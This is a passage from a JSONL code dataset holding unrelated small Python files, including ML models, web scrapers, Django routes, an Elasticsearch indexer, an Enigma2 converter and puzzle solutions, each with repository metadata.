365:\r\n self.assertTrue(is_day_in_reg_year(a))\r\n\r\n def test_neg(self):\r\n wrong = [\"\", \" \", 0, 366, -1, 16.5, [], None]\r\n for a in wrong:\r\n if a in wrong:\r\n self.assertFalse(is_day_in_reg_year(a))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"ca2_test_ecp_range_pos_neg.py","file_name":"ca2_test_ecp_range_pos_neg.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87834235","text":"import argparse\n\nimport torch\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils.data import DataLoader\n\nfrom torchvision import datasets, transforms\n\n# Each process runs on 1 GPU device specified by the local_rank argument.\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--local_rank\", type=int)\nargs = parser.parse_args()\n\n# Initializes the distributed backend which will take care of sychronizing nodes/GPUs\ntorch.distributed.init_process_group(backend='nccl')\n\n# Encapsulate the model on the GPU assigned to the current process\ndevice = torch.device('cuda', args.local_rank)\n\nmodel = torch.nn.Linear(784, 10)\nmodel = 
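The source_sql.py record above recurses by hand to emit one "source <file>;" line per SQL dump. os.walk expresses the same traversal directly; the path here is a stand-in for /data/www/baike_sql:

import os

path = "/tmp/baike_sql"  # stand-in for the real dump directory
out = os.path.join(path, "baike.sql")
with open(out, mode="a+", encoding="UTF-8") as sql_file:
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            if full == out:
                continue  # don't source the output file into itself
            sql_file.write("source %s;\n" % full)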
model.to(device)\ndistrib_model = torch.nn.parallel.DistributedDataParallel(model,\n device_ids=[args.local_rank],\n output_device=args.local_rank)\n\n# Restricts data loading to a subset of the dataset exclusive to the current process\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,)),\n])\n\ndataset = datasets.MNIST(root, train=train, transform=transform, download=True)\nsampler = DistributedSampler(dataset)\n\ndataloader = DataLoader(dataset, sampler=sampler)\n\nprint('Starting training')\nfor inputs, labels in dataloader:\n predictions = distrib_model(inputs.to(device)) # Forward pass\n loss = loss_function(predictions, labels.to(device)) # Compute loss function\n loss.backward() # Backward pass\n optimizer.step() # Optimizer step\n print('.', end='')\n","sub_path":"hugging_face/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73151108","text":"\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Author : Dengpan Fu (v-defu@microsoft.com)\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.nn import init\r\n\r\n\r\n\r\n\r\n\r\nclass MnistModel(nn.Module):\r\n \"\"\" Construct basic MnistModel for mnist adversal attack \"\"\"\r\n def __init__(self, re_init=False, has_dropout=False):\r\n super(MnistModel, self).__init__()\r\n self.re_init = re_init\r\n self.has_dropout = has_dropout\r\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2)\r\n self.conv2 = nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2)\r\n self.pool = nn.MaxPool2d(2)\r\n self.relu = nn.ReLU(True)\r\n self.fc1 = nn.Linear(7*7*64, 1024)\r\n self.fc2 = nn.Linear(1024, 10)\r\n if self.has_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n if self.re_init:\r\n self._init_params(self.conv1)\r\n self._init_params(self.conv2)\r\n self._init_params(self.fc1)\r\n self._init_params(self.fc2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.relu(x)\r\n x = self.pool(x)\r\n\r\n x = self.conv2(x)\r\n x = self.relu(x)\r\n x = self.pool(x)\r\n\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n x = self.relu(x)\r\n\r\n if self.has_dropout:\r\n x = self.dropout(x)\r\n\r\n x = self.fc2(x)\r\n\r\n return x\r\n\r\n def _init_params(self, module, mean=0.1, std=0.1):\r\n init.normal_(module.weight, std=0.1)\r\n if hasattr(module, 'bias'):\r\n init.constant_(module.bias, mean)\r\n\r\ndef mnist_net():\r\n return MnistModel()","sub_path":"code/base_model/MnistModel.py","file_name":"MnistModel.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119886515","text":"import re\n\ndef isMatch(s: str, p: str) -> bool:\n\tresult = re.findall('^' + p + '$', s)\n\tif result != []:\n\t\treturn True\n\treturn False\t\n\t\ns = 'aab'\np = 'a.b'\nans = isMatch(s, p)\nprint(ans)","sub_path":"leetcode/isMatch.py","file_name":"isMatch.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598107240","text":"from lib.utils import get_index_name\nimport logging\n__author__ = \"minh\"\n\n\nclass Indexer:\n def __init__(self, es):\n # logging.info(\"Initializing 
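The isMatch record above anchors re.findall with '^' + p + '$' just to test whether the whole string matches; re.fullmatch says that directly and avoids building a throwaway result list:

import re

def is_match(s: str, p: str) -> bool:
    # fullmatch returns a Match object only when p spans all of s.
    return re.fullmatch(p, s) is not None

print(is_match("aab", "a.b"))  # True: '.' matches the middle 'a'
print(is_match("aab", "a.c"))  # False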
indexer\")\n self.es = es\n\n def init_analyzers(self, index_config):\n logging.info(\"Initializing analyzers\")\n self.es.indices.create(index=get_index_name(index_config), body={\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"textual\": {\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"stop\",\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"standard\"\n },\n \"number_text\": {\n \"filter\": [\n \"lowercase\",\n \"word_delimiter\",\n \"stop\",\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"standard\"\n },\n \"whitespace_text\": {\n \"filter\": [\n \"lowercase\",\n \"stop\",\n \"kstem\"\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"whitespace\"\n }\n }\n }\n }\n })\n logging.debug(\"Done: Initializing analyzers\")\n\n def index_column(self, column, source_name, index_config):\n logging.info(\"Indexing column \" + str(column))\n body = column.to_json()\n body['source'] = source_name\n self.es.index(index=get_index_name(index_config), doc_type=source_name,\n body=body)\n\n def index_source(self, source, index_config):\n logging.info(\"Indexing source: {}\".format(source.name))\n # self.es.indices.put_mapping(index=get_index_name(index_config), doc_type=source.index_name, body={\n # source.index_name: {\n # \"properties\": {\n # \"whitespace_textual\": {\n # \"type\": \"string\",\n # \"analyzer\": \"whitespace_text\"\n # },\n # \"number_textual\": {\n # \"type\": \"string\",\n # \"analyzer\": \"number_text\"\n # }\n # }\n # }\n # })\n\n for column in source.column_map.values():\n if column.semantic_type:\n self.index_column(column, source.index_name, index_config)\n\n def delete_column(self, index_config):\n logging.info(\"Deleting index for column\")\n if self.es.indices.exists(get_index_name(index_config)):\n self.es.delete(index=get_index_name(index_config))\n return True\n return False\n\n def clean(self):\n logging.info(\"Cleaning elasticsearch indexer\")\n try:\n # NOTE: dangerous!\n self.es.indices.delete(index='*', ignore=[400, 404])\n return True\n except Exception as e:\n logging.error(\"Error occurred while cleaning index: {}\".format(e))\n print(\"Error occurred while cleaning index: {}\".format(e))\n raise Exception(\"Error occurred while cleaning index: {}\".format(e))\n","sub_path":"search/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312697933","text":"# coding:utf-8\n__author__ = 'albert233'\n\ndef check_field_exists(obj,data,field_none=[]):\n \"\"\"\n 验证字段是否合法\n 验证数据不能为空\n :param data: 需要验证的数据\n :param field_none: 可以为空的字段\n :return:\n \"\"\"\n\n for field in data.keys():\n if not hasattr(obj, field):\n # 验证字段是否存在\n raise Exception(\"params error\")\n if not data.get(field,None):\n # 验证字段是否为none\n if data[field] not in field_none:\n raise Exception(\"{}不能为空\")\n\ndef process_result(data, output):\n black = [\"_sa_instance_state\"]\n ret = []\n for obj in data:\n if output:\n tmp = {}\n for f in input:\n tmp[f] = getattr(obj,f)\n ret.append(tmp)\n else:\n tmp = obj.__dict__\n for p in black:\n try:\n tmp.pop(p)\n except:\n pass\n ret.append(tmp)\n return ret\n\n","sub_path":"03/hz-longbao/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224618525","text":"from enigma import iServiceInformation\r\nfrom Components.Converter.Converter import Converter\r\nfrom Components.Element import 
cached\r\nfrom Tools.Directories import fileExists\r\nfrom Poll import Poll\r\nimport os\r\n\r\nfrom enigma import iServiceInformation\r\nfrom Components.Converter.Converter import Converter\r\nfrom Components.config import config\r\nfrom Components.Element import cached\r\nfrom Tools.Directories import fileExists\r\nfrom Poll import Poll\r\nimport os\r\n\r\nclass EmuName(Poll, Converter, object):\r\n\tdef __init__(self, type):\r\n\t\tConverter.__init__(self, type)\r\n\t\tPoll.__init__(self)\r\n\t\tself.poll_interval = 2000\r\n\t\tself.poll_enabled = True\r\n\t\t\r\n\t@cached\r\n\tdef getText(self):\r\n\t\tinfo = \"\"\r\n\t\tinfo2 = \"\"\r\n\t\tcamdname = None\r\n\t\tcardname = None\r\n\t\tcamdlist = None\r\n\t\t# VTI \t\r\n\t\tif fileExists(\"/tmp/.emu.info\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/tmp/.emu.info\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# TS-Panel\r\n\t\telif fileExists(\"/etc/startcam.sh\"):\r\n\t\t\ttry:\r\n\t\t\t\tfor line in open(\"/etc/startcam.sh\"):\r\n\t\t\t\t\tif \"script\" in line:\r\n\t\t\t\t\t\tcamdname = \"%s\" % line.split(\"/\")[-1].split()[0][:-3]\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# BlackHole\t\r\n\t\telif fileExists(\"/etc/CurrentBhCamName\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/CurrentBhCamName\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# Domica\t\r\n\t\telif fileExists(\"/etc/active_emu.list\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/active_emu.list\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t\t\t# OoZooN\r\n\t\telif fileExists(\"/tmp/cam.info\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/tmp/cam.info\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# Merlin2\t\r\n\t\telif fileExists(\"/etc/clist.list\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/clist.list\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t#Pli\r\n\t\telif fileExists(\"/etc/init.d/softcam\") or fileExists(\"/etc/init.d/cardserver\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/init.d/softcam\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t\ttry:\r\n\t\t\t\tcardname = open(\"/etc/init.d/cardserver\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcardname = None \r\n\t\telif fileExists(\"/etc/.emustart\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/.emustart\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\r\n\t# NFR SoftCam Manager\r\n\t\tif config.NFRSoftcam.actcam.value:\r\n\t\t\tif config.NFRSoftcam.actcam.value != \"none\":\r\n\t\t\t\tcamdlist = config.NFRSoftcam.actcam.value.split()\r\n\r\n\t\tif cardname:\r\n\t\t\tfor line in cardname:\r\n\t\t\t\tinfo2 = \"\"\r\n\t\t\t\tif 'oscam' in line.lower():\r\n\t\t\t\t\tinfo2 = 'oscam'\r\n\t\t\t\telif 'newcs' in line.lower():\r\n\t\t\t\t\tinfo2 = 'newcs'\r\n\t\t\t\telif 'wicard' in line.lower():\r\n\t\t\t\t\tinfo2 = 'wicardd'\r\n\t\t\t\telif 'cccam' in line.lower():\r\n\t\t\t\t\tinfo2 = 'cccam'\r\n\t\t\tcardname.close()\r\n\t\tif camdname:\r\n\t\t\tcamdlist = camdname\r\n\t\tif camdlist:\r\n\t\t\tinfo = 'unknow'\r\n\t\t\tfor line in camdlist:\r\n\t\t\t\tif 'mgcamd' in line.lower() and 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscammgcamd'\r\n\t\t\t\t\tbreak\r\n\t\t\t\tif 'cccam' in line.lower() and 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscamcccam'\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif 'mgcamd' in line.lower():\r\n\t\t\t\t\tinfo = 'mgcamd'\r\n\t\t\t\telif 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscam'\r\n\t\t\t\telif 'wicard' in line.lower():\r\n\t\t\t\t\tinfo = 
'wicardd'\r\n\t\t\t\telif 'cccam' in line.lower():\r\n\t\t\t\t\tinfo = 'cccam'\r\n\t\t\t\telif 'camd3' in line.lower():\r\n\t\t\t\t\tinfo = 'camd3'\r\n\t\t\t\telif 'evocamd' in line.lower():\r\n\t\t\t\t\tinfo = 'evocamd'\r\n\t\t\t\telif 'newcs' in line.lower():\r\n\t\t\t\t\tinfo = 'newcs'\r\n\t\t\t\telif 'rqcamd' in line.lower():\r\n\t\t\t\t\tinfo = 'rqcamd'\r\n\t\t\t\telif 'gbox' in line.lower():\r\n\t\t\t\t\tinfo = 'gbox'\r\n\t\t\t\telif 'mpcs' in line.lower():\r\n\t\t\t\t\tinfo = 'mpcs'\r\n\t\t\t\telif 'sbox' in line.lower():\r\n\t\t\t\t\tinfo = 'sbox'\r\n\t\tif camdname:\r\n\t\t\tcamdname.close()\r\n\t\treturn info2 + info\r\n\r\n\ttext = property(getText)\r\n\r\n\tdef changed(self, what):\r\n\t\tConverter.changed(self, (self.CHANGED_POLL,))\r\n","sub_path":"usr/lib/enigma2/python/Components/Converter/MaggyEmuName.py","file_name":"MaggyEmuName.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"426661724","text":"import re\nfrom collections import namedtuple\nOrder = namedtuple('Order', ['type', 'x_start', 'y_start', 'x_end', 'y_end'])\n\ndef setup_input(file_loc):\n orders = []\n with open(file_loc) as f:\n r = re.compile(r'(turn on|turn off|toggle) (\\d+),(\\d+) through (\\d+),(\\d+)')\n for line in f:\n s = r.search(line)\n orders.append(Order(s.group(1), int(s.group(2)), int(s.group(3)),\n int(s.group(4)), int(s.group(5))))\n return orders\n\ndef part1(file_loc):\n grid = []\n for _ in range(1000):\n grid.append([False] * 1000)\n orders = setup_input(file_loc)\n for order in orders:\n for i in range(order.x_start, order.x_end + 1):\n for j in range(order.y_start, order.y_end + 1):\n if order.type == 'turn on':\n grid[i][j] = True\n elif order.type == 'turn off':\n grid[i][j] = False\n else:\n grid[i][j] = not grid[i][j]\n return sum(sum(row) for row in grid)\n\ndef part2(file_loc):\n grid = []\n for _ in range(1000):\n grid.append([0] * 1000)\n orders = setup_input(file_loc)\n for order in orders:\n for i in range(order.x_start, order.x_end + 1):\n for j in range(order.y_start, order.y_end + 1):\n if order.type == 'on':\n grid[i][j] += 1\n elif order.type == 'off':\n grid[i][j] = max(0, grid[i][j] - 1)\n else:\n grid[i][j] += 2\n return sum(sum(row) for row in grid)\n","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94132174","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\nclass StockDoesNotExistError(Exception):\n pass\n\nclass NetworkError(Exception):\n pass\n\nclass Price:\n '''this class is going to web scrap yahoo finance to get the price\n as well as the current percentage'''\n def __init__(self,symbol):\n try:\n headers={'User-Agent':'Mozilla/5.0'}\n\n network = requests.get(f\"https://finance.yahoo.com/quote/{symbol}/history\",headers=headers)\n except:\n raise NetworkError()\n if network.status_code == 302:\n raise StockDoesNotExistError(symbol)\n\n self.soup = bs(network.content, 'html5lib')\n if self.soup.find(\"span\",attrs={\"data-reactid\":\"32\"}) is not None:\n if self.soup.find(\"span\",attrs={\"data-reactid\":\"32\"}).text == f\"No results for '{symbol.lower()}'\":\n raise StockDoesNotExistError(symbol)\n if self.soup.find(\"span\", attrs={\"data-reactid\": \"6\"}) is not None:\n if self.soup.find(\"span\", attrs={\"data-reactid\": \"6\"}).text == f\"Symbols similar to '{symbol.lower()}'\":\n raise 
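A quick demo of the day06 parsing above on two sample lines, with the grid shrunk to 10x10 so the part-1 logic is easy to eyeball. (Worth noting: part2 in the record compares order.type against 'on'/'off', but the regex captures 'turn on'/'turn off', so its first two branches can never fire.)

import re
from collections import namedtuple

Order = namedtuple('Order', ['type', 'x_start', 'y_start', 'x_end', 'y_end'])
r = re.compile(r'(turn on|turn off|toggle) (\d+),(\d+) through (\d+),(\d+)')

lines = ["turn on 0,0 through 4,4", "toggle 2,2 through 3,3"]
orders = [Order(s.group(1), *map(int, s.groups()[1:]))
          for s in map(r.search, lines)]

grid = [[False] * 10 for _ in range(10)]
for o in orders:
    for i in range(o.x_start, o.x_end + 1):
        for j in range(o.y_start, o.y_end + 1):
            if o.type == 'turn on':
                grid[i][j] = True
            elif o.type == 'turn off':
                grid[i][j] = False
            else:
                grid[i][j] = not grid[i][j]
print(sum(sum(row) for row in grid))  # 25 lit, minus 4 toggled off -> 21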
StockDoesNotExistError(symbol)\n self.symbol = symbol\n # print(symbol)\n \n\n def Price(self):\n '''the purpose of this method is to get the current price'''\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"50\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"46\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"46.69\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n def percentage(self):\n '''this method will allow the user to view the current stock percentage'''\n try:\n percentage = self.soup.find('span', attrs={\"data-reactid\": \"51\"}).text\n self.current_percentage = float(percentage.split(\" \")[0]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n self.total_percentage = float(percentage.split(\" \")[1]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n percentage = self.soup.find('span', attrs={\"data-reactid\": \"47\"}).text\n self.current_percentage = float(percentage.split(\" \")[0]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n self.total_percentage = float(percentage.split(\" \")[1]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n def driver(self):\n '''this will make it so the class can be automated'''\n\n self.Price()\n self.percentage()\n","sub_path":"IslanderStockPrices.py","file_name":"IslanderStockPrices.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410993530","text":"\"\"\"mywebsite1 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . 
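A condensed sketch of the Price workflow above. The data-reactid hooks are brittle, layout-dependent details (the "46.69" variant in the last fallback looks like a typo, since react ids are integers), so this version only keeps the fetch/parse/raise shape:

import requests
from bs4 import BeautifulSoup

class StockDoesNotExistError(Exception):
    pass

def fetch_price(symbol):
    headers = {"User-Agent": "Mozilla/5.0"}
    resp = requests.get(
        "https://finance.yahoo.com/quote/%s/history" % symbol, headers=headers)
    if resp.status_code == 302:
        raise StockDoesNotExistError(symbol)
    soup = BeautifulSoup(resp.content, "html5lib")
    span = soup.find("span", attrs={"data-reactid": "50"})  # layout-dependent hook
    if span is None:
        raise StockDoesNotExistError(symbol)
    return float(span.text.split(" ")[0].replace(",", ""))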
import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home),\n url(r'^page1/$', views.page1),\n url(r'^index/$', views.index),\n url(r'^year/(\\d{4})$', views.page_year), # http://127.0.0.1:8000/year/2015\n url(r'^date/(\\d{4})/(\\d+)/(\\d+)$', views.date), # http://127.0.0.1:8000/date/2015/1/25\n url(r'^birthday/(\\d{4})/(\\d{1,2})/(\\d{1,2})$', views.birthday), # http://127.0.0.1:8000/birthday/2015/01/3\n # url(r'^students/(?P\\w+)/(?P\\d{1,2})$', views.students),\n url(r'^students/$', views.students, {'name': \"盖伦\", \"age\": '35'}),\n url(r'^goods/(?P\\d+)$', views.goods, {\"shop\": \"无尽之刃\"}),\n url(r'^music/', include('music.urls')),\n]\n","sub_path":"Django/day01/mywebsite1/mywebsite1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470155904","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 15:16:27 2018\n\n@author: neeleshrampal\n\"\"\"\nimport numpy as np\nx='/Users/neeleshrampal/OneDrive/Honours Research/colocation/Cloud_phase_dataset_water_reset1.npy'\ny='/Users/neeleshrampal/OneDrive/Honours Research/colocation/Cloud_phase_dataset_ice_reset1.npy'\n#x refers to the water dataset, while y refers to the ice dataset\nwater=np.load(x)\nice=np.load(y)\nfigure()\nplot(np.nansum(ice[3,0,0],axis=0))\np=np.nansum(ice[0,0,0],axis=0)/np.nansum(ice[0,0,0]+water[0,0,0],axis=0)\n\np_temp=(ice[0,0,0])#number of ice in a event\nclust=np.nansum(ice[0,0,0]+water[0,0,0],axis=1)\nwhere=np.where(clust>0)\np=p[where]\np_temp=p_temp[where]\np_temp2=(ice[0,0,0]+water[0,0,0])#\np_temp2=p_temp2[where]\nsum1=array([p_temp[i,:]**2 for i in range(23825)])\nsum2=array([p_temp2[i,:]*p_temp[i,:] for i in range(23825)])\nsum3=array([p_temp2[i,:]**2 for i in range(23825)])\nse=(len(where[0])/sum(clust))*np.sqrt((np.nansum(sum1,axis=0)-2*p*np.nansum(sum2,axis=0)+np.nansum(sum3,axis=0)*p**2)/(23825*(23825-1)))","sub_path":"code_8th_may.py","file_name":"code_8th_may.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520621559","text":"import aiohttp\nimport json\nfrom config.conf import SEARCH_URL, FILTER_URL, QUERY_LIMIT_MAX\n\n\ndef build_custom_filter():\n cache = {}\n async def build(include_list):\n inc = \";\".join(include_list)\n if inc in cache:\n return cache[inc]\n else:\n default = {\"unsafe\": 'true', \"include\": inc}\n headers = {'content-type': 'application/json'}\n async with aiohttp.ClientSession() as session:\n async with session.post(FILTER_URL, data=json.dumps(default), headers=headers) as resp:\n if resp.status != 200:\n raise Exception(await resp.json())\n response = await resp.json()\n cache[inc] = {'filter': response['items'][0]['filter']}\n return cache[inc]\n return build\n\nfilterBuilder = build_custom_filter()\n\nasync def request(param):\n try:\n data = await build_query_param(param)\n except Exception as e:\n raise Exception(e);\n async with aiohttp.ClientSession() as session:\n async with session.get(SEARCH_URL, params=data) as resp:\n res = await resp.json()\n return res\n\nasync def build_query_param(param):\n default = {'page': 1, 'pagesize': QUERY_LIMIT_MAX, 'site': 'stackoverflow'}\n custom_filter = await filterBuilder(['.page_size', '.total'])\n return {**default, **param, 
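build_query_param() above relies on later unpacks winning when dicts are merged with {**a, **b, **c}; a tiny demonstration of that precedence rule:

default = {'page': 1, 'pagesize': 100, 'site': 'stackoverflow'}
param = {'pagesize': 30, 'tagged': 'python'}
custom_filter = {'filter': '!abc123'}  # hypothetical filter id

merged = {**default, **param, **custom_filter}
print(merged['pagesize'])  # 30 -- param overrides default
print(merged['filter'])    # '!abc123'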
**custom_filter}\n\n\n\n\n\n","sub_path":"SE/SERequest.py","file_name":"SERequest.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59244915","text":"import csv\n\nFILENAME = \"players.txt\"\n\ndef read_players():\n try:\n players = []\n with open(FILENAME, newline=\"\") as file:\n reader = csv.reader(file)\n for row in reader:\n player = {}\n player[\"name\"] = row[0]\n player[\"position\"] = row[1]\n player[\"at_bats\"] = row[2]\n player[\"hits\"] = row[3]\n players.append(player)\n return players\n except FileNotFoundError:\n return None\n\ndef write_players(players):\n with open(FILENAME, \"w\") as file:\n for player in players:\n file.write(player[\"name\"] + \",\")\n file.write(player[\"position\"] + \",\")\n file.write(player[\"at_bats\"] + \",\")\n file.write(player[\"hits\"] + \"\\n\")\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512015625","text":"# BSD 3-Clause License; see https://github.com/jpivarski/awkward-1.0/blob/master/LICENSE\n\nimport os\nimport platform\nimport re\nimport subprocess\nimport sys\nimport shutil\nimport glob\n\nimport distutils.version\nimport setuptools\nimport setuptools.command.build_ext\nfrom setuptools import setup\n\nclass CMakeExtension(setuptools.Extension):\n def __init__(self, name, sourcedir=\"\"):\n setuptools.Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\nclass CMakeBuild(setuptools.command.build_ext.build_ext):\n def run(self):\n try:\n out = subprocess.check_output([\"cmake\", \"--version\"])\n except OSError:\n raise RuntimeError(\"CMake must be installed to build the following extensions: \" + \", \".join(x.name for x in self.extensions))\n\n if platform.system() == \"Windows\":\n cmake_version = distutils.version.LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if cmake_version < \"3.4\":\n raise RuntimeError(\"CMake >= 3.4 is required on Windows\")\n\n for x in self.extensions:\n self.build_extension(x)\n\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=\" + extdir, \"-DPYTHON_EXECUTABLE=\" + sys.executable]\n\n cfg = \"Debug\" if self.debug else \"Release\"\n build_args = [\"--config\", cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{0}={1}\".format(cfg.upper(), extdir), \"-DCMAKE_WINDOWS_EXPORT_ALL_SYMBOLS=TRUE\"]\n if sys.maxsize > 2**32:\n cmake_args += [\"-A\", \"x64\"]\n build_args += [\"--\", \"/m\"]\n\n else:\n cmake_args += [\"-DCMAKE_BUILD_TYPE=\" + cfg]\n\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp)\n subprocess.check_call([\"cmake\", \"--build\", \".\"] + build_args, cwd=self.build_temp)\n subprocess.check_call([\"ctest\", \"--output-on-failure\"], cwd=self.build_temp)\n\n for lib in (glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"libawkward-cpu-kernels-static.*\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"libawkward-static.*\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.so\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.dylib\")) +\n 
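The players store above maps CSV columns by position; csv.DictReader with explicit fieldnames makes the same row-to-dict mapping declarative:

import csv

FILENAME = "players.txt"
FIELDS = ["name", "position", "at_bats", "hits"]

def read_players():
    try:
        with open(FILENAME, newline="") as file:
            # Each row becomes a dict keyed by FIELDS, like the hand-built version.
            return list(csv.DictReader(file, fieldnames=FIELDS))
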